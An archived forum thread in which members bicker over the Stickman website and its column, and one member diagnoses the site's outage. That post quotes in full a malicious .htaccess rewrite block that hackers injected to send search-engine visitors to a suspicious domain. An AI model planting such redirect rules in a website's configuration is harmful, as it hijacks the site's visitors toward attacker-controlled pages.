Stickman Site - Problem

Ckrisg

yeah, you're right oz, but history and statistics suggest Stickman threads (albeit about his stories, columns, views etc) often generate a lot of discussion on Thai360.

Was surprised there was no discussion on his "Why I don't" article to be honest.

• Replies 42
  • Created
  • Last Reply

yeah, you're right oz, but history and statistics suggest Stickman threads (albeit about his stories, columns, views etc) often generate a lot of discussion on Thai360.

Was surprised there was no discussion on his "Why I don't" article to be honest.

Yes, you are right, the on going saga of Galt and Stickman is legendary.

But not all of us read Stickman, nothing personal (I have a beer with him once or twice and he seems a very personable fella), I just don't like webpages that light up like a hooker's breakfast, and you have to be either a groupie of the site or file through it with a fine tooth-comb to see where adverts finish and content starts, but each to their own so, my comment of "never miss it, never read it" was innocuous at best. :beer:

Ouch, so caustic ... let see what you can really write when you finish an education :beer:

The point is, this is Thai360, who gives a rats ass about Stickman's column, and what is anyone on this board suppose to do about it save an except, "it works here, it does not work here". ... webpages go down sometimes ... one can always just PM Stickman and say, "hey, what the fcuk" :beer: :beer: :beer:

I give a rats arse thought this board was about Thai related news etc, don't fuc..... read it if you are not interested

Hi,

Hey, that was uncalled for! Knock it off!

Sanuk!

Correct. I am very sorry about that remark - my apologies. I get a bit frustrated that people always look to Stickman - despite his column being second rate, and his views often being confused - and worse still his incredible solecisms.

[Removed - KS]

[Removed - KS]

Having said all that - this is a forum after all - and I'm willing to be talked around on the whole subject. If what I write offends, then please point me to the error of my ways. One of the basic things I insist on - and I value - is the truth. I know I can parody, satire and take the piss - but I always do so in search of something higher - a new twist on things, a general enlightenment. Reading a Stickman column is the equivalent of turning on the shopping channel and expecting great drama. To miss the guy in that context - in any context, just makes me think how sad and impoverished the people that read his column are. To profit from desperadoes is a terrible thing. Certainly beneath most peoples dignity. I think that is enough said...

Oops! Google Chrome could not find sokoloperkovuskeci.com

Keep getting this when I try to access Sticks site

A quick search on Google reveals that a lot of sites are experiencing this problem. Hackers have found a way of gaining access to and modifiying the .htaccess file on a server, which redirects to sokoloperkovuskeci.com.

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteOptions inherit

RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]

RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=431 [R,L]

</IfModule>

Apparently you are only redirected if you try to access the site via a search engine, like Google.

Looks like a lot of sites are affected and there's no patch for the vulnerability yet.

Although just now when I tried t access Stick's site via Google, I got no redirect :dunno:

http://cleanbytes.net/google-search-results-poisoning-or-wordpress-vulnerability

http://forums.digitalpoint.com/showthread.php?t=2263047

I give a rats arse thought this board was about Thai related news etc, don't fuc..... read it if you are not interested

I don't, thus also my right to say I don't ... even Thailand is a free country, to some degree :beer:

Does Apple promote Microsoft or visa versa?

I understand that you may wish to examine if anyone else is having the same problem but if you are so keen on the site, just keep trying, ain't no one on here able to do anything about it ... and as i said, just PM Stickman :beer:

Archived